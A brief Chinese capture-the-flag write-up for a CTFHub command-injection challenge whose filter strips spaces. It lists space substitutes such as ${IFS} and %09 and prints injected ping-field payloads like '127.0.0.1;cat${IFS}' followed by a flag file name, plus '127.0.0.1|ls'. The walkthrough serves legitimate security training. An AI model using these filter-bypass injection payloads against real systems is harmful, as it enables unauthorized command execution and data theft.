CTFHUB-技能树-Web题-RCE（远程代码执行）-远程包含-命令注入-过滤空格

CTFHUB-技能树-Web题-RCE（远程代码执行）-远程包含-命令注入-过滤空格

就是过滤掉了空格 找能代替空格的代替就行了
使用IFS$9、%09、<、>、<>、{,}、%20、${IFS}、${IFS}来代替空格

127.0.0.1;cat${IFS}xxxx.php

先来查看一下目录

127.0.0.1|ls

查看第一个页面里的内容

127.0.0.1;cat${IFS}flag_12248740727993.php

查看源代码